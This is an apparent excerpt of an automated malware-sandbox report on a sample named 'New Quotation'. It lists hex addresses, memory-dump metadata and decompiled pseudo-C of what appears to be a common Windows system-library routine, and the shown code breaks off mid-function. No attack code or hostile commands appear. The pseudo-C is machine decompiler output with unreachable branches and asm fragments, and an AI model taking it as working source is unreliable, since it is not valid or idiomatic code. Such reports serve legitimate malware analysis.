                                                                                                                                                                                          0x1d87a25b
                                                                                                                                                                                          0x1d87a266
                                                                                                                                                                                          0x1d87a268
                                                                                                                                                                                          0x1d87a2a7
                                                                                                                                                                                          0x1d87a2ad
                                                                                                                                                                                          0x1d87a2b0
                                                                                                                                                                                          0x1d87a2b7
                                                                                                                                                                                          0x1d87a2bd
                                                                                                                                                                                          0x1d87a2b9
                                                                                                                                                                                          0x1d87a2b9
                                                                                                                                                                                          0x1d87a2b9
                                                                                                                                                                                          0x1d87a2c1
                                                                                                                                                                                          0x1d87a26a
                                                                                                                                                                                          0x1d87a26e
                                                                                                                                                                                          0x1d87a276
                                                                                                                                                                                          0x1d87a27c
                                                                                                                                                                                          0x1d87a280
                                                                                                                                                                                          0x1d87a287
                                                                                                                                                                                          0x1d87a28e
                                                                                                                                                                                          0x1d87a294
                                                                                                                                                                                          0x1d87a290
                                                                                                                                                                                          0x1d87a290
                                                                                                                                                                                          0x1d87a290
                                                                                                                                                                                          0x1d87a298
                                                                                                                                                                                          0x1d87a29c
                                                                                                                                                                                          0x1d87a2a1
                                                                                                                                                                                          0x1d87a2a1
                                                                                                                                                                                          0x1d87a2c5
                                                                                                                                                                                          0x1d87a2c9
                                                                                                                                                                                          0x1d87a2de
                                                                                                                                                                                          0x1d87a2e1
                                                                                                                                                                                          0x1d87a2cb
                                                                                                                                                                                          0x1d87a2cb
                                                                                                                                                                                          0x1d87a2cd
                                                                                                                                                                                          0x1d87a2d0
                                                                                                                                                                                          0x1d87a2d2
                                                                                                                                                                                          0x1d87a2d2
                                                                                                                                                                                          0x1d87a2d2
                                                                                                                                                                                          0x1d87a2d5
                                                                                                                                                                                          0x1d87a2d9
                                                                                                                                                                                          0x1d87a2d9
                                                                                                                                                                                          0x1d87a2ec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a2ec
                                                                                                                                                                                          0x1d87a047
                                                                                                                                                                                          0x1d87a04a
                                                                                                                                                                                          0x1d87a1d1
                                                                                                                                                                                          0x1d87a1d6
                                                                                                                                                                                          0x1d87a1db
                                                                                                                                                                                          0x1d87a1df
                                                                                                                                                                                          0x1d87a1e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a1e2
                                                                                                                                                                                          0x1d87a050
                                                                                                                                                                                          0x1d87a053
                                                                                                                                                                                          0x1d87a07c
                                                                                                                                                                                          0x1d87a07f
                                                                                                                                                                                          0x1d87a081
                                                                                                                                                                                          0x1d87a097
                                                                                                                                                                                          0x1d87a083
                                                                                                                                                                                          0x1d87a083
                                                                                                                                                                                          0x1d87a085
                                                                                                                                                                                          0x1d87a088
                                                                                                                                                                                          0x1d87a08a
                                                                                                                                                                                          0x1d87a08c
                                                                                                                                                                                          0x1d87a08c
                                                                                                                                                                                          0x1d87a08c
                                                                                                                                                                                          0x1d87a08f
                                                                                                                                                                                          0x1d87a092
                                                                                                                                                                                          0x1d87a092
                                                                                                                                                                                          0x1d87a09a
                                                                                                                                                                                          0x1d87a09d
                                                                                                                                                                                          0x1d87a0a0
                                                                                                                                                                                          0x1d87a0ae
                                                                                                                                                                                          0x1d87a0b1
                                                                                                                                                                                          0x1d87a0c4
                                                                                                                                                                                          0x1d87a0c6
                                                                                                                                                                                          0x1d87a0d0
                                                                                                                                                                                          0x1d87a0d2
                                                                                                                                                                                          0x1d87a0fb
                                                                                                                                                                                          0x1d87a0fd
                                                                                                                                                                                          0x1d87a10e
                                                                                                                                                                                          0x1d87a0ff
                                                                                                                                                                                          0x1d87a0ff
                                                                                                                                                                                          0x1d87a101
                                                                                                                                                                                          0x1d87a104
                                                                                                                                                                                          0x1d87a106
                                                                                                                                                                                          0x1d87a106
                                                                                                                                                                                          0x1d87a106
                                                                                                                                                                                          0x1d87a109
                                                                                                                                                                                          0x1d87a109
                                                                                                                                                                                          0x1d87a0d4
                                                                                                                                                                                          0x1d87a0e1
                                                                                                                                                                                          0x1d87a0e3
                                                                                                                                                                                          0x1d87a0e6
                                                                                                                                                                                          0x1d87a0f1
                                                                                                                                                                                          0x1d87a0f1
                                                                                                                                                                                          0x1d87a0f3
                                                                                                                                                                                          0x1d87a0e8
                                                                                                                                                                                          0x1d87a0e8
                                                                                                                                                                                          0x1d87a0e8
                                                                                                                                                                                          0x1d87a0f5
                                                                                                                                                                                          0x1d87a0f5
                                                                                                                                                                                          0x1d87a117
                                                                                                                                                                                          0x1d87a0c8
                                                                                                                                                                                          0x1d87a0cb
                                                                                                                                                                                          0x1d87a0cb
                                                                                                                                                                                          0x1d87a0b3
                                                                                                                                                                                          0x1d87a0b9
                                                                                                                                                                                          0x1d87a0b9
                                                                                                                                                                                          0x1d87a0a2
                                                                                                                                                                                          0x1d87a0aa
                                                                                                                                                                                          0x1d87a0aa
                                                                                                                                                                                          0x1d87a126
                                                                                                                                                                                          0x1d87a12c
                                                                                                                                                                                          0x1d87a132
                                                                                                                                                                                          0x1d87a136
                                                                                                                                                                                          0x1d87a139
                                                                                                                                                                                          0x1d87a13c
                                                                                                                                                                                          0x1d87a14a
                                                                                                                                                                                          0x1d87a14d
                                                                                                                                                                                          0x1d87a160
                                                                                                                                                                                          0x1d87a162
                                                                                                                                                                                          0x1d87a16c
                                                                                                                                                                                          0x1d87a16e
                                                                                                                                                                                          0x1d87a197
                                                                                                                                                                                          0x1d87a19b
                                                                                                                                                                                          0x1d87a1ac
                                                                                                                                                                                          0x1d87a19d
                                                                                                                                                                                          0x1d87a19d
                                                                                                                                                                                          0x1d87a19f
                                                                                                                                                                                          0x1d87a1a2
                                                                                                                                                                                          0x1d87a1a4
                                                                                                                                                                                          0x1d87a1a4
                                                                                                                                                                                          0x1d87a1a4
                                                                                                                                                                                          0x1d87a1a7
                                                                                                                                                                                          0x1d87a1a7
                                                                                                                                                                                          0x1d87a170
                                                                                                                                                                                          0x1d87a17d
                                                                                                                                                                                          0x1d87a17f
                                                                                                                                                                                          0x1d87a182
                                                                                                                                                                                          0x1d87a18d
                                                                                                                                                                                          0x1d87a18d
                                                                                                                                                                                          0x1d87a18f
                                                                                                                                                                                          0x1d87a184
                                                                                                                                                                                          0x1d87a184
                                                                                                                                                                                          0x1d87a184
                                                                                                                                                                                          0x1d87a191
                                                                                                                                                                                          0x1d87a191
                                                                                                                                                                                          0x1d87a1b5
                                                                                                                                                                                          0x1d87a164
                                                                                                                                                                                          0x1d87a167
                                                                                                                                                                                          0x1d87a167
                                                                                                                                                                                          0x1d87a14f
                                                                                                                                                                                          0x1d87a155
                                                                                                                                                                                          0x1d87a155
                                                                                                                                                                                          0x1d87a13e
                                                                                                                                                                                          0x1d87a146
                                                                                                                                                                                          0x1d87a146
                                                                                                                                                                                          0x1d87a1b9
                                                                                                                                                                                          0x1d87a1bf
                                                                                                                                                                                          0x1d87a1c0
                                                                                                                                                                                          0x1d87a1c3
                                                                                                                                                                                          0x1d87a1c5
                                                                                                                                                                                          0x1d87a1c7
                                                                                                                                                                                          0x1d87a1c7
                                                                                                                                                                                          0x1d87a1ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a1ca
                                                                                                                                                                                          0x1d87a058
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a058
                                                                                                                                                                                          0x1d87a02e
                                                                                                                                                                                          0x1d87a025
                                                                                                                                                                                          0x1d87a025
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a025
                                                                                                                                                                                          0x1d87a022
                                                                                                                                                                                          0x1d87a022
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879fdc
                                                                                                                                                                                          0x1d879fe1
                                                                                                                                                                                          0x1d879fe6
                                                                                                                                                                                          0x1d879fe8
                                                                                                                                                                                          0x1d87a003
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a003
                                                                                                                                                                                          0x1d879fef
                                                                                                                                                                                          0x1d879ff3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879ff9
                                                                                                                                                                                          0x1d879ffb
                                                                                                                                                                                          0x1d879da6
                                                                                                                                                                                          0x1d879da6
                                                                                                                                                                                          0x1d879dac
                                                                                                                                                                                          0x1d879db6
                                                                                                                                                                                          0x1d879db6
                                                                                                                                                                                          0x1d879dae
                                                                                                                                                                                          0x1d879dae
                                                                                                                                                                                          0x1d879dae
                                                                                                                                                                                          0x1d879db8
                                                                                                                                                                                          0x1d879dba
                                                                                                                                                                                          0x1d879dd9
                                                                                                                                                                                          0x1d879dd9
                                                                                                                                                                                          0x1d879ddd
                                                                                                                                                                                          0x1d879ddf
                                                                                                                                                                                          0x1d879e5a
                                                                                                                                                                                          0x1d879e5d
                                                                                                                                                                                          0x1d879e61
                                                                                                                                                                                          0x1d879e72
                                                                                                                                                                                          0x1d879e63
                                                                                                                                                                                          0x1d879e63
                                                                                                                                                                                          0x1d879e65
                                                                                                                                                                                          0x1d879e68
                                                                                                                                                                                          0x1d879e6a
                                                                                                                                                                                          0x1d879e6a
                                                                                                                                                                                          0x1d879e6a
                                                                                                                                                                                          0x1d879e6d
                                                                                                                                                                                          0x1d879e6d
                                                                                                                                                                                          0x1d879e75
                                                                                                                                                                                          0x1d879e78
                                                                                                                                                                                          0x1d879e7a
                                                                                                                                                                                          0x1d879e94
                                                                                                                                                                                          0x1d879e7c
                                                                                                                                                                                          0x1d879e8c
                                                                                                                                                                                          0x1d879e8c
                                                                                                                                                                                          0x1d879e96
                                                                                                                                                                                          0x1d879e98
                                                                                                                                                                                          0x1d87a335
                                                                                                                                                                                          0x1d87a335
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879e9e
                                                                                                                                                                                          0x1d879e9e
                                                                                                                                                                                          0x1d879ea2
                                                                                                                                                                                          0x1d879f8b
                                                                                                                                                                                          0x1d879f8e
                                                                                                                                                                                          0x1d879f8e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879f8e
                                                                                                                                                                                          0x1d879ea8
                                                                                                                                                                                          0x1d879eb0
                                                                                                                                                                                          0x1d879eb3
                                                                                                                                                                                          0x1d879f74
                                                                                                                                                                                          0x1d879f79
                                                                                                                                                                                          0x1d879f7d
                                                                                                                                                                                          0x1d879f7f
                                                                                                                                                                                          0x1d879f82
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879f82
                                                                                                                                                                                          0x1d879eb9
                                                                                                                                                                                          0x1d879ec2
                                                                                                                                                                                          0x1d879ec4
                                                                                                                                                                                          0x1d879ece
                                                                                                                                                                                          0x1d879ed0
                                                                                                                                                                                          0x1d879ed1
                                                                                                                                                                                          0x1d879ed1
                                                                                                                                                                                          0x1d879ed1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879ed1
                                                                                                                                                                                          0x1d879ec8
                                                                                                                                                                                          0x1d879ecb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879ecb
                                                                                                                                                                                          0x1d879e98
                                                                                                                                                                                          0x1d879de1
                                                                                                                                                                                          0x1d879de4
                                                                                                                                                                                          0x1d879de8
                                                                                                                                                                                          0x1d879df1
                                                                                                                                                                                          0x1d879df1
                                                                                                                                                                                          0x1d879df1
                                                                                                                                                                                          0x1d879df6
                                                                                                                                                                                          0x1d879df9
                                                                                                                                                                                          0x1d879e09
                                                                                                                                                                                          0x1d879e0c
                                                                                                                                                                                          0x1d879e0e
                                                                                                                                                                                          0x1d879e2b
                                                                                                                                                                                          0x1d879e10
                                                                                                                                                                                          0x1d879e1e
                                                                                                                                                                                          0x1d879e20
                                                                                                                                                                                          0x1d879e23
                                                                                                                                                                                          0x1d879e23
                                                                                                                                                                                          0x1d879e2d
                                                                                                                                                                                          0x1d879e2f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879e35
                                                                                                                                                                                          0x1d879e35
                                                                                                                                                                                          0x1d879e38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879e3a
                                                                                                                                                                                          0x1d879e3e
                                                                                                                                                                                          0x1d879e4f
                                                                                                                                                                                          0x1d879e40
                                                                                                                                                                                          0x1d879e40
                                                                                                                                                                                          0x1d879e42
                                                                                                                                                                                          0x1d879e45
                                                                                                                                                                                          0x1d879e47
                                                                                                                                                                                          0x1d879e47
                                                                                                                                                                                          0x1d879e47
                                                                                                                                                                                          0x1d879e4a
                                                                                                                                                                                          0x1d879e4a
                                                                                                                                                                                          0x1d879e52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879e52
                                                                                                                                                                                          0x1d879dfb
                                                                                                                                                                                          0x1d879dfb
                                                                                                                                                                                          0x1d879dfe
                                                                                                                                                                                          0x1d879ee1
                                                                                                                                                                                          0x1d879ee1
                                                                                                                                                                                          0x1d879ee3
                                                                                                                                                                                          0x1d87a05e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a05e
                                                                                                                                                                                          0x1d879ee9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879ee9
                                                                                                                                                                                          0x1d879dbc
                                                                                                                                                                                          0x1d879dc1
                                                                                                                                                                                          0x1d879dc6
                                                                                                                                                                                          0x1d879dc8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879dcf
                                                                                                                                                                                          0x1d879dd3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879dd3
                                                                                                                                                                                          0x1d879dba
                                                                                                                                                                                          0x1d879fda
                                                                                                                                                                                          0x1d879faf
                                                                                                                                                                                          0x1d879fa6
                                                                                                                                                                                          0x1d879fa6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879fa6
                                                                                                                                                                                          0x1d879fa3
                                                                                                                                                                                          0x1d879fa3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879fa3
                                                                                                                                                                                          0x1d879f05
                                                                                                                                                                                          0x1d879ed9
                                                                                                                                                                                          0x1d879edf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879edf
                                                                                                                                                                                          0x1d879cdd
                                                                                                                                                                                          0x1d879cdf
                                                                                                                                                                                          0x1d879ce4
                                                                                                                                                                                          0x1d879ce6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879ce8
                                                                                                                                                                                          0x1d879ce8
                                                                                                                                                                                          0x1d87a33c
                                                                                                                                                                                          0x1d87a33c
                                                                                                                                                                                          0x1d87a341
                                                                                                                                                                                          0x1d87a343
                                                                                                                                                                                          0x1d87a355
                                                                                                                                                                                          0x1d87a345
                                                                                                                                                                                          0x1d87a34e
                                                                                                                                                                                          0x1d87a34e
                                                                                                                                                                                          0x1d87a35a
                                                                                                                                                                                          0x1d87a35d
                                                                                                                                                                                          0x1d87a35f
                                                                                                                                                                                          0x1d87a365
                                                                                                                                                                                          0x1d87a36c
                                                                                                                                                                                          0x1d87a36e
                                                                                                                                                                                          0x1d87a375
                                                                                                                                                                                          0x1d87a379
                                                                                                                                                                                          0x1d87a379
                                                                                                                                                                                          0x1d87a375
                                                                                                                                                                                          0x1d87a36c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87a37e
                                                                                                                                                                                          0x1d879ce6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: 0ad245b464c66400b75694d13a8816e7e4b7fd26f3cf4330362f0a929f56212d
                                                                                                                                                                                          • Instruction ID: be7968e8bac661370e18ed9bf58e87a82b7aab46e09d115d7aed052efbd52b6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad245b464c66400b75694d13a8816e7e4b7fd26f3cf4330362f0a929f56212d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D22CB34618695CFE715CF69C090373B7E1FF45B04F04889AE89A8F286E335E592DB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D6970 Relevance: 2.0, APIs: 1, Instructions: 548COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E1D7D6970(signed int __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				short _v16;
				void* _v20;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed char _v41;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				void* _v124;
				void* _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t232;
				signed int _t236;
				intOrPtr _t238;
				signed int _t243;
				signed int _t244;
				signed int _t246;
				signed int* _t247;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t253;
				signed int _t260;
				signed int _t267;
				intOrPtr* _t269;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t285;
				signed int _t287;
				signed int _t289;
				intOrPtr _t291;
				intOrPtr _t293;
				signed int _t294;
				signed int _t299;
				signed int _t300;
				intOrPtr _t302;
				intOrPtr _t303;
				signed int _t317;
				signed int _t319;
				signed int _t333;
				signed int _t334;
				intOrPtr _t335;
				signed int _t336;
				signed int _t339;
				signed int _t340;
				signed int _t344;
				signed char _t348;
				signed int* _t350;
				short _t351;
				signed int _t353;
				signed int _t358;
				intOrPtr _t359;
				signed int _t364;
				signed int _t366;
				signed int _t368;
				signed int _t370;
				signed int _t372;
				signed int* _t379;
				signed int _t380;
				signed char _t386;
				signed int _t388;
				signed int _t389;
				intOrPtr _t394;
				intOrPtr _t397;
				void* _t398;
				signed int _t399;
				intOrPtr _t400;
				signed int _t401;
				intOrPtr _t406;
				signed int _t408;
				intOrPtr _t410;
				intOrPtr* _t411;
				signed int _t414;
				intOrPtr _t416;
				void* _t417;
				signed int _t418;
				signed int _t419;
				signed int* _t422;
				signed int _t424;
				signed int _t426;
				intOrPtr _t429;
				void* _t433;
				intOrPtr _t434;
				signed int _t435;

				_v8 =  *0x1d8cb370 ^ _t435;
				_v80 = _a4;
				_t333 = __ecx;
				_v52 = __ecx;
				_t348 =  *((intOrPtr*)( *[fs:0x18] + 0xf76));
				_v41 = _t348;
				_t406 = __edx;
				_t388 =  *0x1d8c6640; // 0x1
				_t424 = _t388;
				_v60 = __edx;
				_v40 =  *( *[fs:0x18] + 0xf74) & 0x0000ffff;
				_v56 = _t424;
				if(__ecx != 0) {
					_t232 =  *(__ecx + 0x110);
					_t389 =  *0x1d8c6640; // 0x1
					__eflags = _t232;
					if(_t232 != 0) {
						goto L2;
					} else {
						goto L1;
					}
					L126:
				} else {
					L1:
					_t232 =  *0x7ffe03c0;
				}
				L2:
				if( *((intOrPtr*)(_t333 + 0x100)) != _t232) {
					L1D7E2330(_t232, _t333 + 0x2c);
					E1D8A4407(_t333);
					E1D7E24D0(_t333 + 0x2c);
					_t389 =  *0x1d8c6640; // 0x1
					_t424 = _v56;
					_t348 = _v41;
				}
				_t236 = 0;
				_v36 = 0;
				if(_t389 != 0) {
					_t422 =  *(_t333 + 0x20);
					_t386 = _t348 & 0x000000ff;
					do {
						_t333 = _v52;
						if(_t422[1] != _v40) {
							goto L67;
						} else {
							if(( *_t422 & 0x00000001 << _t386) == 0) {
								_t236 = _v36;
								goto L67;
							} else {
								_t424 = _v36;
								_v56 = _t424;
							}
						}
						L8:
						_t406 = _v60;
						goto L9;
						L67:
						_t236 = _t236 + 1;
						_t422 =  &(_t422[3]);
						_v36 = _t236;
						__eflags = _t236 - _t389;
					} while (_t236 < _t389);
					goto L8;
				}
				L9:
				if(_t424 >= _t389) {
					_t424 = 0;
					_v56 = 0;
				}
				_t390 =  *(_t406 + 0xc8);
				_v64 = _v41 & 0x000000ff;
				_t238 =  *((intOrPtr*)(_t333 + 0x104));
				_v40 = _t390;
				if(_t424 != _t390) {
					__eflags = _t238 - 0xffffffff;
					if(_t238 == 0xffffffff) {
						__eflags =  *((char*)(_t406 + 0xd0));
						if( *((char*)(_t406 + 0xd0)) == 0) {
							 *((char*)(_t406 + 0xd0)) = 1;
						} else {
							asm("lock dec dword [eax+edx*4]");
						}
						asm("lock inc dword [eax+esi*4]");
					}
					 *(_t406 + 0xc8) = _t424;
					_t350 =  *(_t333 + 0x20);
					_v36 =  *(_t350 + 4 + (_t424 + _t424 * 2) * 4) & 0x0000ffff;
					_v48 =  *(_t350 + 4 + (_t390 + _t390 * 2) * 4) & 0x0000ffff;
					_t243 = E1D7E3C40();
					__eflags = _t243;
					if(_t243 == 0) {
						_t244 = 0x7ffe0386;
					} else {
						_t244 =  *( *[fs:0x30] + 0x50) + 0x22c;
					}
					__eflags =  *_t244;
					if( *_t244 != 0) {
						_t390 = _v40;
						E1D8A51B6(_t333, _v40, _t424, _v48, _v36);
					}
					_t351 = _v36;
					__eflags = _v48 - _t351;
					if(_v48 != _t351) {
						asm("stosd");
						_push(0xc);
						asm("stosd");
						asm("stosd");
						_push( &_v20);
						_push(0x1e);
						_push(0xfffffffe);
						_v16 = _t351;
						_v20 = 0;
						E1D812A60();
						_push("true");
						_push( &_v64);
						_push(0xd);
						_push(0xfffffffe);
						E1D812A60();
						_t406 = _v60;
					}
				} else {
					if(_t238 == 0xffffffff) {
						__eflags =  *((char*)(_t406 + 0xd0));
						if( *((char*)(_t406 + 0xd0)) == 0) {
							 *((char*)(_t406 + 0xd0)) = 1;
							asm("lock inc dword [eax+esi*4]");
						}
					}
				}
				_v36 = _t424;
				if( *((intOrPtr*)(_t333 + 0x104)) == 0xffffffff) {
					__eflags =  *((intOrPtr*)(_t406 + 0xcc)) - 0x10;
					if( *((intOrPtr*)(_t406 + 0xcc)) < 0x10) {
						goto L13;
					} else {
						_t319 = E1D8A527A(_t333);
						__eflags = _t319;
						if(_t319 == 0) {
							goto L93;
						} else {
							goto L13;
						}
					}
				} else {
					L13:
					_v48 = 0;
					_t353 = _t424 + _t424 * 2 << 2;
					_t246 = _t333 + 0x10;
					_v76 = _t353;
					_v40 = _t246;
					while(1) {
						_t408 =  *_t246 + _t353;
						_t426 = _t408 + 8;
						_t247 = L1D7E2330(_t246, _t426);
						_t334 =  *_t408;
						_v72 = _t334;
						if( *((intOrPtr*)(_t334 + 4)) != _t408) {
							break;
						}
						_t247 =  *_t334;
						if(_t247[1] != _t334) {
							break;
						} else {
							 *_t408 = _t247;
							_t247[1] = _t408;
							asm("lock cmpxchg [esi], ecx");
							_t370 = 1;
							if(1 != 1) {
								while(1) {
									_t280 = _t370 & 0x00000006;
									__eflags = _t280 - 2;
									_v68 = _t280;
									_t281 = _t370;
									_t390 = (0 | _t280 == 0x00000002) * 4 - 1 + _t370;
									asm("lock cmpxchg [ebx], esi");
									__eflags = _t281 - _t370;
									if(_t281 == _t370) {
										break;
									}
									_t370 = _t281;
								}
								__eflags = _v68 - 2;
								_t334 = _v72;
								if(_v68 == 2) {
									_t390 = 0;
									E1D803BDB(_t408 + 8, 0, 0);
								}
							}
							asm("sbb eax, eax");
							_t285 =  ~(_t334 - _t408) & _t334;
							if(_t285 == 0) {
								_t372 = _v48 + 1;
								_t246 = _v40 + 4;
								_v48 = _t372;
								__eflags = _t372 - 2;
								_v40 = _t246;
								_t353 = _v76;
								if(_t372 <= 2) {
									continue;
								} else {
									_t333 = _v52;
									_t424 = _v56;
									L93:
									__eflags =  *((char*)(_t333 + 0xe5));
									if( *((char*)(_t333 + 0xe5)) != 0) {
										L100:
										_t287 = 0;
									} else {
										_t289 = _t333 + 0x10;
										_t418 = _t424;
										do {
											_t390 = _t289;
											_v40 = 0;
											_v52 = _t289;
											while(1) {
												_t285 = E1D8A523E(_t333,  *_t390 + (_t418 + _t418 * 2) * 4, _t390);
												__eflags = _t285;
												if(_t285 != 0) {
													goto L19;
												}
												_t390 = _v52;
												__eflags = _t418 + 1 -  *0x1d8c6640; // 0x1
												asm("sbb edi, edi");
												_t418 = _t418 & _t418 + 0x00000001;
												_v36 = _t418;
												__eflags = _t418 - _t424;
												if(_t418 != _t424) {
													continue;
												} else {
													_t390 = _t390 + 4;
													_t317 = _v40 + 1;
													_v52 = _t390;
													_v40 = _t317;
													__eflags = _t317 - 2;
													if(_t317 <= 2) {
														continue;
													} else {
														goto L99;
													}
												}
												goto L25;
											}
											goto L19;
											L99:
											__eflags =  *((char*)(_t333 + 0xe5));
											_t289 = _t333 + 0x10;
										} while ( *((char*)(_t333 + 0xe5)) == 0);
										goto L100;
									}
									goto L25;
								}
							} else {
								_t333 = _v52;
								L19:
								_t291 = _t285 + 0xfffffff4;
								_t434 = _v60;
								 *_v80 = _t291;
								_t419 =  *(_t434 + 0xc8);
								_v84 =  *(_t291 + 8) & 0x000000ff;
								_t293 =  *((intOrPtr*)(_t333 + 0x104));
								if(_v36 != _t419) {
									__eflags = _t293 - 0xffffffff;
									if(_t293 == 0xffffffff) {
										__eflags =  *((char*)(_t434 + 0xd0));
										if( *((char*)(_t434 + 0xd0)) == 0) {
											 *((char*)(_t434 + 0xd0)) = 1;
										} else {
											asm("lock dec dword [eax+edi*4]");
										}
										asm("lock inc dword [eax+ecx*4]");
									}
									_t294 = _v36;
									 *(_t434 + 0xc8) = _t294;
									_t379 =  *(_t333 + 0x20);
									_v40 =  *(_t379 + 4 + (_t294 + _t294 * 2) * 4) & 0x0000ffff;
									_v48 =  *(_t379 + 4 + (_t419 + _t419 * 2) * 4) & 0x0000ffff;
									_t299 = E1D7E3C40();
									__eflags = _t299;
									if(_t299 == 0) {
										_t300 = 0x7ffe0386;
									} else {
										_t300 =  *( *[fs:0x30] + 0x50) + 0x22c;
									}
									__eflags =  *_t300;
									if( *_t300 != 0) {
										_t390 = _t419;
										E1D8A51B6(_t333, _t419, _v36, _v48, _v40);
									}
									_t380 = _v40;
									__eflags = _v48 - _t380;
									if(_v48 != _t380) {
										asm("stosd");
										_push(0xc);
										asm("stosd");
										asm("stosd");
										_push( &_v32);
										_push(0x1e);
										_push(0xfffffffe);
										_v28 = _t380;
										_v32 = 0;
										E1D812A60();
										_push("true");
										_push( &_v84);
										_push(0xd);
										_push(0xfffffffe);
										E1D812A60();
									}
								} else {
									if(_t293 == 0xffffffff) {
										__eflags =  *((char*)(_t434 + 0xd0));
										if( *((char*)(_t434 + 0xd0)) == 0) {
											 *((char*)(_t434 + 0xd0)) = 1;
											asm("lock inc dword [eax+ecx*4]");
										}
									}
								}
								if(_v36 != _v56) {
									_t302 = 0;
								} else {
									_t303 =  *((intOrPtr*)(_t434 + 0xcc));
									if(_t303 < 0x10) {
										_t302 = _t303 + 1;
									} else {
										_t302 = 0x10;
									}
								}
								 *((intOrPtr*)(_t434 + 0xcc)) = _t302;
								_t287 = 1;
								L25:
								_pop(_t417);
								_pop(_t433);
								return E1D814B50(_t287, _t333, _v8 ^ _t435, _t390, _t417, _t433);
							}
						}
						goto L126;
					}
					asm("int 0x29");
					__eflags =  *_t247;
					if( *_t247 == 0) {
						_t248 = 0x7ffe0386;
					} else {
						_t248 =  *( *[fs:0x30] + 0x50) + 0x22c;
					}
					__eflags =  *_t248;
					if( *_t248 != 0) {
						E1D8A4B67( *((intOrPtr*)(_t426 + 0x5c)), _t334,  *((intOrPtr*)(_t426 + 0x30)),  *((intOrPtr*)(_t426 + 0x34)),  *((intOrPtr*)(_t426 + 0x3c)));
					}
					_t250 = E1D7D7072(_a4, _t426, 0);
					__eflags = _t250;
					if(_t250 != 0) {
						_t252 =  *( *[fs:0x30] + 0x50);
						__eflags = _t252;
						if(_t252 != 0) {
							__eflags =  *_t252;
							if( *_t252 == 0) {
								goto L36;
							} else {
								_t253 =  *( *[fs:0x30] + 0x50) + 0x22c;
								goto L37;
							}
							goto L126;
						} else {
							L36:
							_t253 = 0x7ffe0386;
						}
						L37:
						__eflags =  *_t253;
						if( *_t253 != 0) {
							E1D8A4C59( *((intOrPtr*)(_t426 + 0x5c)), _t334,  *((intOrPtr*)(_t426 + 0x30)),  *((intOrPtr*)(_t426 + 0x34)),  *((intOrPtr*)(_t426 + 0x3c)));
						}
						_t410 =  *((intOrPtr*)(_t426 + 0x3c));
						_t335 =  *((intOrPtr*)(_t426 + 0x34));
						_t394 =  *((intOrPtr*)(_t426 + 0x30));
						_t358 =  *( *[fs:0x18] + 0xf90);
						__eflags = _t358;
						if(_t358 == 0) {
							_t336 = 0;
							_v84 = 0;
						} else {
							 *((intOrPtr*)(_t358 + 0xc)) =  *((intOrPtr*)(_t358 + 0xc)) + 1;
							_t267 =  *(_t358 + 8) - 0x00000001 & 0x00000001;
							__eflags = _t267;
							 *(_t358 + 8) = _t267;
							_t366 = _t358 + (_t267 + _t267 * 2) * 8;
							_t269 = _t366 + 0x18;
							 *((intOrPtr*)(_t366 + 0x1c)) = _t335;
							_v72 = _t366;
							_v84 = _t269;
